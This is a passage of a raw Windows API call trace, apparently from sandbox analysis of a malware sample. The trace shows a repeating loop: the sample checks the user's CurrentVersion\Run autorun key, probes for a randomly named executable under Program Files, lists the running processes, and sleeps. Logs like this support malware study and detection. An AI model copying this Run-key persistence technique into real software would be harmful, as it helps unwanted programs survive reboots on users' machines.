SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0271.536] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0271.536] NtClose (Handle=0x14c) returned 0x0 [0271.536] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0271.536] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0271.538] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0271.538] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0271.538] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0271.538] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0271.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0271.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0271.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0271.733] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0271.772] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0271.772] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0271.773] NtClose (Handle=0x14c) returned 0x0 [0271.773] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0271.773] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0271.773] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0271.773] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0271.773] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0271.773] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0271.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0271.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0271.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0271.946] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0272.003] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0272.003] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0272.003] NtClose (Handle=0x14c) returned 0x0 [0272.003] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0272.003] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0272.003] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0272.003] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0272.003] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0272.003] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0272.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0272.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0272.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0272.188] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0272.225] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0272.225] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0272.225] NtClose (Handle=0x14c) returned 0x0 [0272.225] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0272.225] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0272.225] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0272.225] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0272.225] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0272.225] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0272.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0272.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0272.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0272.409] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0272.458] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0272.458] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0272.458] NtClose (Handle=0x14c) returned 0x0 [0272.458] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0272.459] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0272.459] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0272.459] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0272.459] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0272.460] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0272.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0272.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0272.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0272.685] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0272.726] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0272.726] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0272.726] NtClose (Handle=0x14c) returned 0x0 [0272.726] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0272.726] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0272.726] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0272.726] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0272.726] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0272.726] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0272.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0272.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0272.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0272.912] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0272.958] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0272.958] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0272.958] NtClose (Handle=0x14c) returned 0x0 [0272.958] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0272.958] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0272.958] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0272.958] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0272.958] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0272.958] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0272.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0272.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0273.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0273.152] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0273.192] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0273.192] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0273.192] NtClose (Handle=0x14c) returned 0x0 [0273.192] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0273.192] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0273.192] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0273.192] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0273.192] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, 